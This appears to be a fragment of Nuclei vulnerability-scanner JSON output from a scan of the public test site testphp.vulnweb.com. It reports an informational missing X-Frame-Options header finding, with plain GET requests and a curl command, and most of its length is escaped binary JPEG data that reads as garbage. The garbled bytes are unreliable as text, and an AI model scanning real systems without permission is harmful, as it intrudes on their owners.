\ufffd\\ufffdt\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffdx\\ufffdZ3HСD%\\ufffd\\ufffd\\ufffd\\ufffdT\\ufffd\\u0017B\\ufffd\\u001e\\ufffd\\ufffdv\\ufffd\\ufffd\\u0002\\ufffd\\ufffd[\\ufffdB\\u003ecc\\ufffdu\\ufffdP\\ufffd|\\ufffd\\ufffd\\ufffd˃d\\ufffd\\ufffd\\ufffd\\ufffd\\u0015\\ufffd\\ufffd\\ufffd\\ufffd\\u0016@;\\u001et\\ufffd\\ufffd\\ufffdI q\\ufffd\\ufffd\\ufffd\\u001c|\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\ufffdCL\\ufffd\\ufffd1\\ufffd%@\\ufffdB\\ufffd\\ufffd\\u0008\\u0004\\ufffd5\\ufffd\\u001b\\u0017V\\u003c\\ufffd8\\ufffd\\ufffd#\\ufffdQ\\u001364\\ufffdE#Fɹ\\u0018\\ufffd\\ufffd\\ufffdk\\u000e\\u003c\\u0010H#\\ufffd$jΒޤ~\\ufffd\\ufffd\\ufffdS\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffdZ\\ufffd:\\u000f\\u001d'5\\ufffd\\ufffd\\ufffd\\ufffdzs;\\ufffdӤ\\ufffd\\ufffd6\\ufffd\\r\\u0015$i\\ufffd⤠nE?q\\ufffd\\ufffd\\ufffdsK\\u0019h\\u0018\\ufffd( \\ufffd5d]_﫺fw\\ufffdL\\u0019\\u0000$\\ufffdk\\ufffd\\u0000G\\ufffd\\\\\\ufffd\\ufffdЧO\\ufffd\\ufffdm\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\ufffdH\\ufffd\\ufffd\\ufffd\\n\\ufffd\\ufffdx\\u0004]\\ufffd}\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\ufffd$0ώ\\ufffd\\ufffd\\u0010\\ufffdB7314\\u0015Tr\\ufffd\\ufffd\\u0000\\ufffd\\ufffdc\\ufffdj\\ufffd\\ufffd\\ufffd\\u001aJ\\ufffd]A\\u0017tG\\ufffd\\u0007L\\ufffd\\ufffd\\ufffd\\ufffds\\ufffd嶰g\\ufffd8\\ufffd\\ufffdW\\u001f\\\"F\\ufffd\\\\\\t\\u0013\\ufffdS\\ufffd\\ufffd_c\\ufffd:\\ufffd\\ufffd\\ufffdGYy\\ufffd\\u0002z\\ufffd\\ufffd\\u0011;U\\ufffd\\ufffd\\ufffd\\u0001I\\ufffd\\ufffd]\\ufffdw\\ufffdگ\\ufffdd\\ufffdt\\ufffd\\ufffdXs\\u001d\\ufffdfW\\ufffd\\ufffd\\u001c\\ufffd\\ufffd\\ufffdx\\u0004X\\ufffd/\\ufffdW\\ufffd\\ufffd\\ufffd\\ufffdD\\u0005\\u0015\\ufffdC7\\ufffdU\\ufffd\\ufffd\\ufffd\\ufffdp+β]\\u001b\\ufffd\\u003cl\\ufffd}Rޒ\\u000b\\ufffdC]\\ufffd\\u0007\\ufffd\\ufffd\\ufffd\\ufffd@\\ufffdbN\\ufffd\\\"20e\\\"\\ufffd\\u0006\\ufffd\\u001a\\ufffd \\ufffd\\u0014\\ufffdT\\ufffd\\ufffd\\u0011\\ufffd\\u003e8\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdQ\\ufffd\\ufffd\\u0010N\\ufffd;\\ufffd\\u001a\\ufffdb\\u0007ƺQgV\\ufffd\\ufffd^5\\ufffde\\ufffdB\\u0004\\ufffd\\ufffdȠ\\u001e5\\ufffd\\ufffd$\\ufffdԱ\\ufffd؟I\\ufffd\\u0012\\u0001\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdu\\ufffd_\\ufffd\\ufffd\\ufffd\\u001d\\ufffd\\ufffd~\\ufffd\\u0018Ѫ\\ufffd\\ufffdҜh\\ufffd\\ufffd\\ufffd1\\ufffdA\\u0000\\u0013\\ufffd\\u001bA\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd/\\ufffd\\ufffd\\ufffd\\ufffd_\\ufffdU\\ufffdcV\\ufffd\\ufffd\\u0007\\ufffdm_\\ufffd\\u00188S\\ufffd@\\ufffd\\ufffd\\ufffd\\ufffdSSUn\\u001b\\ufffd\\ufffdp\\u003eOβ\\ufffd\\u0001\\ufffd\\ufffd\\ufffd3\\ufffd\\u000fU\\ufffd\\ufffd\\ufffd\\ufffd\\u0008a\\ufffd\\\\\\ufffd\\u0000\\ufffdSSV\\u003eE\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd,u\\u0006\\ufffd\\ufffd\\ufffd:\\ufffd\\u001cO\\u0003\\ufffd\\u00048B\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdӜef}$\\ufffd\\u0006=e\\ufffd\\tf˗\\ufffd\\ufffdZ\\ufffdm\\ufffd\\ufffd\\ufffdε\\ufffd\\ufffd\\ufffd\\u001a\\ufffd\\ufffd)\\ufffd\\u0010\\\\1a\\u0002\\u001f\\u0012\\ufffd;k\\ufffd\\ufffd\\u0018\\ufffd\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdՌX\\ufffdez\\ufffd\\u0004\\u0011u\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd=F\\u0006\\ufffd,\\u001d\\ufffd\\ufffd\\u0004\\ufffd菅sr'N\\ufffd,\\ufffd10亠\\ufffdTy\\ufffdۏmMM$y\\ufffd\\u0000='[oW\\ufffd\\ufffd3W\\ufffd\\ufffdT\\ufffd\\ufffd}'\\u001f+$ \\ufffd\\ufffd$( p\\ufffd{\\ufffd5\\ufffd\\ufffd\\ufffdښ\\ufffda\\ufffdr\\ufffd\\u0026\\u0018\\ufffdͫ\\ufffd󩩮\\u000ba\\u0013\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:24.198029592Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; CrOS aarch64 13597.84.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36' 'http://testphp.vulnweb.com/pictures/4.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/3.jpg.tn\",\"path\":\"/pictures/3.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/3.jpg.tn\",\"request\":\"GET /pictures/3.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 3725\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:42 GMT\\r\\nEtag: \\\"4dca64a1-e8d\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0001\\u0004\\u0003\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0004\\u0005\\u0006\\u0007\\u0008\\ufffd\\ufffd\\u00002\\u0010\\u0000\\u0002\\u0001\\u0003\\u0003\\u0003\\u0003\\u0003\\u0003\\u0003\\u0004\\u0003\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0000\\u0004\\u0011\\u0005\\u0012!\\u00061A\\u0013\\\"Q\\u00142a\\u0007q\\ufffd\\u0015B\\ufffd\\u0008\\u0016#3C\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0001\\u0005\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0002\\u0003\\u0005\\u0006\\u0007\\u0001\\u0004\\ufffd\\ufffd\\u00002\\u0011\\u0000\\u0001\\u0003\\u0003\\u0002\\u0003\\u0005\\u0007\\u0004\\u0003\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0000\\u0002\\u0003\\u0004\\u00111\\u0005!\\u0012\\u0013A\\u0014Qaq\\ufffd\\u0006\\\"#\\ufffd\\ufffd\\ufffd\\ufffd2\\ufffd\\ufffd\\ufffd3R\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\ufffdW\\ufffdz\\ufffdM.\\ufffdwow\\n\\ufffdC$\\u0012\\ufffd\\ufffd\\u001b\\ufffd2\\t\\ufffd\\u0004\\u001f\\ufffd\\ufffdV\\ufffd\\ufffd\\ufffd\\u0013u\\u001b;6\\ufffd\\ufffd\\ufffdŎp6\\ufffdI\\ufffd\\u0000l\\u0000\\u0000\\u003c\\ufffd\\ufffd\\ufffd\\ufffdI$\\ufffd\\r\\ufffd\\ufffd\\ufffdxU\\ufffd/E\\ufffd]\\ufffd\\ufffd\\ufffd\\u001b\\u0018\\u0000\\u0000\\u0002\\ufffd\\u0010I\\ufffd8\\u0002\\ufffd_A\\ufffd\\ufffd\\u001f\\t;7\\ufffd^\\ufffdJ\\ufffd\\ufffd\\u0013^\\u0006\\ufffd\\ufffdMB\\ufffd\\ufffdN\\ufffdM\\ufffd]\\ufffdk\\u001b0Ei\\ufffd\\u0008\\u0019\\ufffd\\ufffd\\ufffd54R$\\ufffd\\ufffd\\u001c\\ufffdb\\ufffd\\ufffd\\u001c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdV\\ufffd}\\ufffd\\ufffd\\ufffd\\u0026\\ufffdng\\ufffd\\u001at\\ufffd\\ufffd\\ufffd\\u0010\\ufffdV^\\ufffd\\u001eB7\\ufffd\\ufffd\\ufffd܌\\ufffd\\ufffd\\u000b\\ufffdд\\u000bk\\u0013!\\ufffd\\ufffd\\ufffd#\\u001a\\ufffd\\u0000\\ufffd\\u001f\\ufffd\\ufffd\\u0017\\ufffd\\u0018\\ufffd\\ufffd@\\u001cq\\ufffd\\ufffdx\\ufffd\\ufffdC\\ufffd\\ufffd2Xn\\ufffd\\ufffd\\ufffd\\ufffd^W\\ufffd\\ufffd9\\ufffd\\ufffd,\\u001a=J\\ufffd\\r\\u0015\\ufffd\\ufffd[\\ufffdV\\ufffd\\ufffdN\\ufffdn./u\\u0012\\ufffd\\\\Or-\\ufffdF\\ufffd\\ufffd\\ufffd\\u000b\\ufffd\\t\\ufffd\\ufffd\\ufffd\\ufffdv\\u001cg\\u003cF*\\u0012\\ufffd\\ufffdJYLR\\rǟ\\ufffdKST\\ufffd\\ufffd\\ufffd\\ufffdE\\u0014Q^e\\ufffd\\ufffdc\\u000c\\u001aJy\\u0019\\ufffd+\\ufffd\\\\\\ufffdt8\\u0026\\ufffdJF)+\\ufffdh\\ufffd\\ufffd(B(\\ufffd\\ufffd\\u0010\\ufffdF))\\ufffd)\\ufffd\\ufffd\\ufffdM\\ufffdQE\\u0014%-#\\ufffd\\ufffd\\ufffd\\u003cu|\\ufffdq\\ufffd\\ufffd,\\ufffd\\u000e\\u0016(W\\ufffd.\\ufffd\\ufffd \\ufffd(9\\ufffd\\ufffd!N\\u0000\\u000c̀\\ufffd\\u001d\\u0002H\\ufffd\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffd#\\ufffd\\ufffdj\\ufffd]\\ufffd\\ufffd6\\u001a\\ufffd\\ufffd픆+\\ufffdw\\u0012D\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdG\\ufffd\\ufffdu=\\u000b\\ufffdr\\ufffd!D\\ufffd4\\ufffd\\ufffdp\\ufffd5\\ufffd\\r\\ufffd\\ufffd\\n6\\ufffd\\ufffd\\ufffd\\ufffd\\u000eq\\ufffd\\ufffd\\u0003\\ufffd6\\ufffd\\ufffdh\\ufffd\\ufffd\\ufffdψq\\u001e\\ufffd\\u001f\\ufffdUA\\ufffdk\\ufffdJ8/a\\ufffd\\ufffdwS\\ufffd6\\ufffd\\u0010\\ufffd\\u0015\\u0002M\\ufffd㴞\\u0008\\ufffd\\ufffd\\ufffd\\ufffd|V\\u0011\\u0014*\\r\\ufffd\\u0011K\\ufffd\\ufffd\\ufffdΥ\\ufffdb\\ufffd\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0015\\u001c\\\"\\ufffd\\u001c\\ufffd\\ufffd\\u0005\\u0001\\ufffd)9\\ufffd\\u0004\\u00023\\ufffd\\ufffd\\u0003Vnt\\ufffd\\ufffd\\ufffd\\ufffd,\\ufffd\\ufffd\\u0018\\u000c\\ufffd,\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd;\\ufffdT\\u0018#4\\ufffd\\u0003\\ufffd\\ufffd$_\\ufffd\\ufffdLj\\ufffds\\u001fτ\\ufffd\\u0003\\ufffd5F\\ufffde}^\\ufffd錛\\ufffd˹Q\\ufffdܟݸn\\\\\\ufffd2pI\\ufffd\\u000e\\u0018\\ufffd\\ufffdp\\ufffdA\\u001bD\\ufffd$c+\\ufffd\\u001bP\\ufffd\\u000e\\ufffdr\\ufffd}\\ufffdی\\ufffd2@\\ufffd+E\\ufffdX\\ufffd\\ufffdl\\ufffd\\ufffdI$\\ufffd\\\\͈\\ufffd1\\ufffd\\u0018.\\ufffd\\u0005\\ufffd\\ufffd\\ufffd\\u001cs\\ufffdc\\u0007\\ufffdn\\ufffd\\u001f\\ufffd\\u0012K\\ufffdY\\ufffd\\u0017\\ufffd\\ufffd\\u000eO\\ufffd6\\u0001 \\u0012pH\\u001cx\\ufffd5\\u0013\\ufffdhkj\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffd\\u0003\\ufffdі4\\ufffdT\\ufffd\\ufffd\\u0019쥺{\\ufffdB[\\ufffd=\\ufffd\\u003c\\n\\u0010 \\ufffd\\u001d\\ufffdm9ov\\ufffdy\\ufffd\\u0003\\ufffd;\\u0000\\ufffd[Qm+\\ufffdfԯ`\\u0002HmIJB\\ufffd\\u0002\\u0015\\ufffd\\ufffd\\ufffd\\ufffd\\u0001\\ufffd\\ufffd8\\ufffd\\ufffd\\ufffd\\u00157\\ufffdw\\ufffd\\ufffd\\ufffdRH\\ufffd/\\ufffd\\ufffdnTz\\ufffd\\ufffd\\t\\ufffd\\ufffd;C\\ufffd\\u000f\\u0019\\u0007;\\\\\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffdҼ\\ufffd\\ufffd29\\u0006H\\u001bm\\ufffd:)\\ufffd\\ufffd{\\u0014%\\ufffdw\\ufffd\\ufffd4\\u000f\\ufffd{\\ufffdR\\ufffdK\\u001b\\ufffd)R{\\ufffd\\ufffd\\ufffdKA\\ufffd\\ufffdy\\u0019U)\\ufffd\\ufffd n%\\ufffdp2\\u0000ɮ\\ufffd\\ufffd\\ufffd4gP\\ufffd@%Cn\\ufffd|\\ufffd\\ufffd\\ufffds\\u001e\\ufffd\\ufffd\\ufffd=\\u0002\\ufffd\\ufffd\\ufffdL\\ufffdwH\\ufffd\\ufffd\\ufffd\\u0005Q\\ufffd\\ufffd\\ufffdB\\ufffd\\u001carX\\ufffd[\\ufffd\\u0018\\ufffd^X\\ufffdZ\\ufffd\\ufffd\\u000fy\\ufffdR\\ufffd\\ufffd\\ufffdn\\u001e\\ufffd\\nѤ\\ufffd\\ufffd$3\\ufffd\\ufffd\\ufffd\\ufffd.s\\ufffdd`\\ufffd\\r\\ufffdU\\ufffd\\u0004\\ufffd\\ufffd\\u0011\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\u000b\\ufffd|\\ufffdT\\r\\u000e\\ufffd\\ufffd\\ufffd\\u0000#\\ufffd\\ufffdzӲ\\ufffd\\ufffddRm\\ufffd\\ufffd-. \\ufffd\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd`q\\ufffd\\ufffd7WW\\ufffd\\u0019\\u0004py\\ufffdKTw\\ufffd\\ufffd\\ufffd\\u0015k\\ufffd^\\u0026\\ufffd\\u0014dc\\ufffd\\u0015!\\u0019\\ufffdL#\\u0014\\ufffd\\u0013\\ufffdu\\ufffdQE\\u0015ĤS[\\ufffd:\\ufffd\\ufffd\\ufffdRٔ\\ufffdQEq8\\ufffd\\ufffd\\u0010x\\ufffd\\u003e\\ufffd\\u0016ݣv{\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffdwY\\u000b\\ufffd\\ufffdE@op\\u0007\\u001f4G4\\ufffd\\ufffd,\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffdYO\\ufffd\\ufffdG\\ufffdJ\\ufffd\\u0000u1\\ufffdp\\ufffd\\u0016\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd:\\ufffd]Һ\\ufffd\\ufffdP\\ufffd\\ufffd\\ufffd\\ufffd+i\\u000b\\u003c\\u0013\\ufffd;\\ufffd\\u0002\\n\\ufffd\\ufffd\\ufffd\\ufffdc\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd2\\u000b\\ufffd\\ufffdm6+\\ufffd\\u0016\\ufffd\\u0019\\ufffd\\ufffd\\u0006H\\ufffd\\ufffd2\\ufffd\\u0006\\ufffd\\u0002\\ufffd\\u0005H\\ufffd\\u0000H'#\\u000c8\\ufffd\\ufffdf\\ufffdw\\ufffd\\ufffdt\\ufffd\\ufffd\\ufffdt\\ufffd7\\ufffd\\ufffd\\ufffd`\\ufffd\\ufffdZ\\u0003\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdx\\u0004\\ufffd\\u000c\\ufffdq\\ufffd\\ufffd\\ufffdƈ+\\ufffd|f\\ufffd\\u001e\\ufffdR\\ufffd\\ufffd@w\\ufffd\\ufffd\\ufffd\\ufffd\\u003e$\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffdh\\ufffd\\ufffdP\\u0010v\\ufffd\\ufffd\\u00078\\ufffd \\u000e\\u000f\\u0000\\u001c5c\\ufffd\\ufffd\\ufffdx`\\u0019\\u0026\\u0017b_\\ufffdy \\u000c\\u00021\\ufffdry\\u003e\\u0006\\u0001\\ufffd\\ufffd\\ufffdL~\\ufffd麪J\\ufffd\\ufffd\\ufffd:X\\ufffd\\ufffd\\u0018\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffdl(,s\\ufffdq\\ufffd\\ufffd8\\ufffdߤ\\ufffd\\ufffd\\ufffd^\\ufffd]\\t\\ufffd\\ufffd\\u0005e\\ufffd\\u0010\\u0006\\ufffd\\ufffd;\\ufffda\\ufffd\\u001d\\ufffd\\ufffdL\\ufffd\\ufffdg\\u0015V\\ufffd\\ufffd梮\\ufffd\\ufffd45\\ufffd\\ufffd\\ufffd\\ufffdc\\ufffdu3Y\\u003cU\\u0014\\ufffd\\u0010\\ufffd\\\\G\\ufffd\\ufffd(\\ufffd\\ufffd\\u0000\\u0004S.\\u0000S\\ufffdv\\ufffd)]\\ufffd8?\\ufffdT\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd6\\ufffdg;U\\u0007\\ufffd\\ufffd\\ufffd\\u0007\\ufffdp+Ch?\\ufffd\\ufffdeN\\ufffd͂\\ufffdz\\\\[\\u000b\\tV\\ufffd=1\\u0011f!\\ufffd\\ufffd\\u0018݁\\ufffd\\ufffd\\u0000+\\ufffd\\u0000\\ufffdO\\u0003\\ufffd\\u0006Z\\ufffd\\ufffd\\ufffd\\ufffdels\\u001cq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd}\\ufffd\\u0003\\u0005\\ufffd\\ufffd\\ufffd\\ufffd\\u0005\\u000cFv\\ufffd\\ufffdS\\ufffd\\u001dr\\ufffdD\\ufffd\\ufffd9\\ufffd\\ufffdk\\ufffd\\ufffd\\ufffd\\u0000O\\u0004!w˳n\\ufffd\\u0016*\\ufffd\\u0001\\ufffd\\ufffd\\u001d\\ufffd\\ufffd\\u0003\\ufffdU5\\ufffduN\\ufffd6\\ufffd\\u0026\\ufffdB\\ufffd{i\\ufffdh\\ufffd\\ufffd\\ufffde)\\u0018dS\\ufffd\\ufffd\\u001e\\t\\u0019\\ufffd\\u00185\\u001eA\\u001b/{\\\\\\u000e\\ufffdEE\\u003c\\ufffd0\\ufffd\\u001aE\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdEr\\ufffda\\ufffd$\\ufffd\\u0018\\ufffd\\ufffd\\ufffd.\\ufffd\\u0015\\ufffd\\ufffd(\\ufffd\\ufffdu\\ufffd$`\\r7a\\ufffd\\ufffdB\\u0001MU\\u0002\\ufffd{=-\\ufffd}\\ufffd5^\\ufffdq\\ufffd(\\\\7)\\ufffd3Y\\ufffd#\\ufffd5-\\u001e?B\\ufffdoRɑ\\ufffd\\ufffd\\ufffd\\ufffdz\\ufffd\\ufffd\\ufffdI]\\ufffd\\ufffd;\\ufffdv\\ufffd\\ufffd\\ufffdTG\\ufffd\\ufffd\\ufffd\\ufffd9\\ufffd\\ufffd#A\\u001e)\\ufffd\\ufffd|f\\ufffd6+\\ufffd\\ufffd\\ufffdz]\\ufffd\\u0015\\ufffdݴ\\ufffd\\ufffd͆\\ufffd\\ufffdFSϴ\\ufffd\\ufffdmĀ\\ufffd\\n\\u0014}ÀvΐV\\ufffd\\ufffd$\\ufffd\\ufffdE\\ufffd\\ufffd\\u0008\\u001d\\ufffdd\\ufffdz{\\ufffdl\\u00000\\ufffd\\ufffd\\ufffdA\\ufffd\\u0018\\r\\ufffd\\ufffd+\\ufffdS\\ufffd\\u0015\\ufffd\\ufffd\\u0000\\ufffd̈:;U\\ufffd\\u0018\\ufffd\\ufffdo\\ufffdC\\u001e\\ufffd\\ufffd\\u000cH\\u0014\\ufffd9\\u0000\\ufffdnq\\ufffd\\ufffd\\u001a\\ufffd\\ufffd\\\\\\ufffdZ\\u0007\\ufffd\\u003cc\\ufffd\\u001f\\u001f\\ufffd{\\ufffdc\\u0012\\ufffd\\u001er\\ufffd\\u001d\\ufffdP\\ufffd@\\ufffd\\ufffdE\\u001c\\ufffd\\ufffd+\\ufffdW\\ufffdk\\ufffd^?\\u0004\\u000f\\ufffd\\ufffdS\\ufffd\\ufffdM\\ufffd\\u00078=\\ufffd\\ufffd\\ufffd\\ufffdHc\\ufffdy\\ufffd\\ufffd S#\\ufffd\\ufffd\\ufffd\\t\\ufffd\\ufffdo\\ufffd{)$g `\\ufffddR\\ufffd-\\ufffd\\ufffdb\\u0002\\ufffd\\ufffd\\u001d(!^\\ufffd\\ufffdL\\ufffd\\\\\\ufffdZ\\u0005\\ufffd\\ufffd\\ufffd\\ufffdJ\\ufffd,ņ\\u0006;\\u000cg\\ufffd\\ufffd\\ufffd\\ufffdߨ\\ufffda\\ufffd\\ufffdԗ\\u001af\\ufffd,Q\\ufffdX\\ufffd\\ufffdn\\ufffd\\u0004\\ufffd\\u0000%\\ufffd9\\u0019V\\ufffd;\\ufffd3\\ufffd\\u001cv[\\ufffdk\\u000b)\\ufffdYA\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdA\\ufffd\\u0019\\ufffd\\ufffd\\u000f\\ufffd\\ufffd\\u0016\\ufffd\\ufffd\\u001a\\ufffd\\ufffd\\ufffds~\\u003e\\ufffdc{q$\\ufffd4r\\u0008\\ufffd\\\"\\ufffdIȐ\\ufffd\\u003c\\ufffdKc䚶\\ufffd3Hǽ\\ufffd5\\r\\u0016h\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffdAo\\ufffd\\ufffd\\ufffd[WGu\\ufffd\\ufffd\\ufffd\\ufffdjVs\\ufffd(\\ufffd}5\\ufffd.^\\u0010\\ufffd\\u00138bQ@]ː9\\u003c\\ufffd}\\ufffdkg\\ufffd\\u001f\\u0007k.@8a\\ufffd23\\ufffd\\ufffdkJ\\ufffd.\\ufffd\\ufffdӬn.\\ufffd\\ufffd\\ufffdP\\ufffd\\ufffdE\\n\\ufffd\\u001cl\\ufffd\\u0018\\ufffd\\ufffd\\u0000\\ufffd\\ufffdp\\ufffdx\\u003e\\ufffdʫ)\\u0015\\ufffdA\\u001b\\ufffd\\ufffdY$\\ufffd\\ufffd\\ufffdYcm\\ufffdc\\ufffd\\u0018\\\\\\u0000|g\\ufffd{\\ufffd\\ufffdQ\\ufffd\\ufffdԲ\\ufffdYL\\ufffdX\\ufffd\\ufffd\\u0002\\ufffdw/~\\ufffd\\u001c\\ufffd\\ufffd:glz}n\\ufffd\\ufffd\\u0014\\ufffd\\ufffd\\ufffd\\ufffdeWJ\\ufffdn\\ufffd\\u0014QE\\tK\\ufffd\\ufffdS\\ufffd?\\ufffd\\u001e\\ufffd\\ufffd\\ufffde\\ufffd\\ufffd2\\ufffd~\\ufffd\\ufffd\\ufffd\\ufffd~(E\\ufffdh\\ufffd\\ufffdw\\ufffd\\ufffd\\ufffdTl\\ufffd⤢\\ufffd\\u0003eRH\\ufffdv\\ufffd\\ufffd@\\ufffd\\u0004\\ufffd3\\ufffd\\t\\u003ce~\\ufffd\\ufffd\\ufffdW\\u0008\\ufffd\\ufffdvn\\u0018n\\u0001\\ufffdy \\ufffd\\ufffd\\u0012\\u0000\\ufffd\\ufffdG\\u0016\\ufffd\\ufffd)\\ufffd6ޙ \\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd3\\u001b\\ufffd\\ufffd?\\u0014\\ufffd7\\u0002\\u0017\\ufffdl\\ufffd\\ufffdԴ\\ufffd.QU\\ufffd\\ufffdE\\ufffd#\\ufffd~8#8$g\\ufffd\\ufffd\\ufffdޑ-\\ufffd^\\ufffd\\ufffdKp\\ufffd\\ufffd\\ufffdaLͱG~\\u0013;s\\ufffd8\\ufffd'\\ufffdq\\\\\\ufffd􃨮.\\u0012]\\u001a\\ufffd帒\\u0012\\u001a\\u0007 \\ufffdH\\ufffd\\u0014\\ufffd\\u0003\\u0001U\\ufffd\\ufffd'\\ufffd\\u0000'\\u001c\\u000cV\\ufffd\\ufffdj\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd%\\t\\u001eb\\ufffdUf\\ufffd;\\u0010\\ufffdX/%w0\\ufffd9\\ufffdk*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd4;\\ufffd\\ufffd\\ufffd\\u0015ޒx*!\\ufffd:\\ufffd\\u0019X\\ufffdn\\ufffd^\\ufffd%\\ufffd\\u0001\\ufffd0\\ufffdF\\ufffdI\\ufffd\\ufffd\\u0018\\ufffd\\ufffd8 